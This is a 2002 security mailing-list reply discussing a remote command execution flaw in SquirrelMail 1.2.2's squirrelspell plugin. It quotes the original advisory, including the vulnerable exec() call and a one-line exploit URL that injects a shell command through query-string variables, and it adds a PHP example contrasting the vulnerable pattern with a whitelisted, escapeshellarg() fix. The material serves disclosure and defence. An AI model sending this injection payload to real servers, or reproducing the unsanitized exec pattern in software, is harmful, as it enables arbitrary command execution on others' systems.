I'm unable to repro on squirrelmail 1.2.2 + openbsd 2.9:

Fatal error: Call to undefined function: sqspell_getlang() in /usr/local/www/htdocs/www2.axisproductions.com/webmail/plugins/squirrelspell/modules/check_me.mod.php on line 59

I'm also curious how much notice this person gave to the Squirrelmail development team to prepare a fix before releasing it to the world.. (same thought applies to the random cross-scripting vulnerability just sent out 3 seconds ago)

On another note, Squirrelmail 1.2.3 was released 01/21/02.. I was wondering if anyone has had the opportunity to test against it. This specific issue doesn't seem to have been noted in the changelog: http://www.squirrelmail.org/changelog.php

Attempted to contact off-list earlier, but it seems the sender's mx is having problems.

<appelast@bsquad.sm.pl>:
213.134.128.227 does not like recipient.
Remote host said: 550 5.7.1 <appelast@bsquad.sm.pl>... Relaying denied
Giving up on 213.134.128.227.

On Thu, 24 Jan 2002 appelast@bsquad.sm.pl wrote:

> Squirrelmail remote execute commands bug
>
> Version Affected :
> 1.2.2
>
> Squirrelmail is a webmail system, which allows users to send, get, read etc. mails. It has some themes, plugins etc. One of the plugins has a very interesting piece of code:
>
> from file check_me.mod.php :
>
> $sqspell_command = $SQSPELL_APP[$sqspell_use_app];
> ...
> $floc = "$attachment_dir/$username_sqspell_data.txt";
> ...
> exec ("cat $floc | $sqspell_command", $sqspell_output);
>
> Everything should be ok, but where does this page include the config files where $attachment_dir and the others are defined? Answer: Nowhere. We can set up the variables $sqspell_command and $floc. Result? We can execute any command, of course as the http server owner.
>
> Exploit :
>
> host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
>
> <appelast@bsquad.sm.pl>
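The pattern quoted in the advisory, as an added example that is not part of the original post and not SquirrelMail's own code or its eventual fix: the request-controlled variables that register_globals hands to the script are modelled as an explicit `$req` array, the vulnerable function builds the same `cat ... | ...` string the plugin passed to exec(), and a hardened variant beside it takes the command table and attachment directory from configuration, lets the request choose only a whitelisted key, and quotes the one file argument with escapeshellarg(). The spell-checker names, the directory path and the username check are assumptions for illustration; the payload is the advisory's own query string, URL-decoded.

```php
<?php
// Added example, not SquirrelMail code. $req stands in for the variables
// that register_globals would inject from the query string.

// --- vulnerable pattern: every input, including the command table, is
//     whatever the client sent ---
function build_command_vulnerable(array $req): string {
    // With register_globals on, these assignments happen implicitly.
    $SQSPELL_APP           = $req['SQSPELL_APP'] ?? array();
    $sqspell_use_app       = $req['sqspell_use_app'] ?? '';
    $attachment_dir        = $req['attachment_dir'] ?? '';
    $username_sqspell_data = $req['username_sqspell_data'] ?? '';

    $sqspell_command = $SQSPELL_APP[$sqspell_use_app] ?? '';
    $floc = "$attachment_dir/$username_sqspell_data.txt";
    return "cat $floc | $sqspell_command";   // the string exec() would run
}

// --- hardened pattern: configuration lives in the script, the request may
//     only select from it ---
// Assumed checker table and directory; a real deployment defines its own.
const SQSPELL_APPS = array(
    'English' => 'ispell -a',
    'Polish'  => 'ispell -a -d polish',
);
const ATTACHMENT_DIR = '/var/spool/squirrelmail/attach';

function build_command_hardened(array $req, string $username): string {
    $use_app = $req['sqspell_use_app'] ?? '';
    // Whitelist: the client picks a key; the command text is never client data.
    if (!array_key_exists($use_app, SQSPELL_APPS)) {
        throw new InvalidArgumentException('unknown spell checker');
    }
    // The username must come from the authenticated session, not the request,
    // and is restricted to a safe character set before it becomes a path.
    if (!preg_match('/^[A-Za-z0-9._-]+$/', $username)) {
        throw new InvalidArgumentException('bad username');
    }
    $floc = ATTACHMENT_DIR . '/' . $username . '.sqspell_data.txt';
    // Redirect the file in as a single quoted argument instead of piping
    // through cat; no interpolated value reaches the shell unquoted.
    return SQSPELL_APPS[$use_app] . ' < ' . escapeshellarg($floc);
}

// Constructed request: the advisory's payload after URL decoding.
$payload = array(
    'SQSPELL_APP'           => array('blah' => 'wall hello'),
    'sqspell_use_app'       => 'blah',
    'attachment_dir'        => '/tmp',
    'username_sqspell_data' => 'plik',
);

echo "vulnerable: ", build_command_vulnerable($payload), "\n";

try {
    echo "hardened:   ", build_command_hardened($payload, 'alice'), "\n";
} catch (InvalidArgumentException $e) {
    echo "hardened:   rejected (", $e->getMessage(), ")\n";
}

// A legitimate selection still works.
echo "hardened:   ", build_command_hardened(array('sqspell_use_app' => 'English'), 'alice'), "\n";
```

Run with `php example.php`. The vulnerable function shows the injected `wall hello` landing after the pipe exactly as the advisory describes; the hardened one refuses the payload because `blah` is not a configured key, and the only value it ever interpolates into the shell string is the quoted path, so neither `attachment_dir` nor `username_sqspell_data` from the request can reach the command line.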